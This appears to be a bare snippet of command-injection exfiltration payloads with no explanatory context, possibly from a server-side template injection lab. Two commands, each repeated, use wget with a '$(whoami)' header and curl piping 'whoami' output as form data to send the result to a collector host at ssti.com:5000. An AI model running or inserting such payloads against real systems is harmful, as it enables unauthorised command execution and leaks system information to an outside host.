wget –header=”test:$(whoami)” http://ssti.com:5000\?username\=1
whoami | curl -F “:data=@-“ http://ssti.com:5000\?username\=1
wget –header=”test:$(whoami)” http://ssti.com:5000\?username\=1
whoami | curl -F “:data=@-“ http://ssti.com:5000\?username\=1